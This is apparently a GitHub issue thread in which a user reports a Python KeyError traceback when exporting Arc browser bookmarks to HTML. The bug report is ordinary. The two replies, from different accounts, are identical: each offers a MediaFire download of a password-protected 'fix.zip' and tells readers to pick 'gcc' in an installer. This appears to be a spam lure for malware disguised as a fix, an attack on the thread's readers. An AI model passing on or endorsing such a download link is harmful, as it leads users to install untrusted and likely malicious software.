### ISSUE TITLE
导出 HTML 出现 traceback 错误

### ISSUE THREAD

**Issue by ghost** [Physton/arc-bookmarks#1]
如题，错误信息如下：

```txt
Traceback (most recent call last):
  File "/Users/chlorine/Downloads/arc-bookmarks/main.py", line 368, in <module>
    bookmarks = get_bookmarks(SidebarFile)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/chlorine/Downloads/arc-bookmarks/main.py", line 125, in get_bookmarks
    spaces[space_index]['title'] = emoji + item['value']['title']
                                           ~~~~~~~~~~~~~^^^^^^^^^
KeyError: 'title'
```

命令为 `python3 main.py --save-html=bookmark.html`。

此致。

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
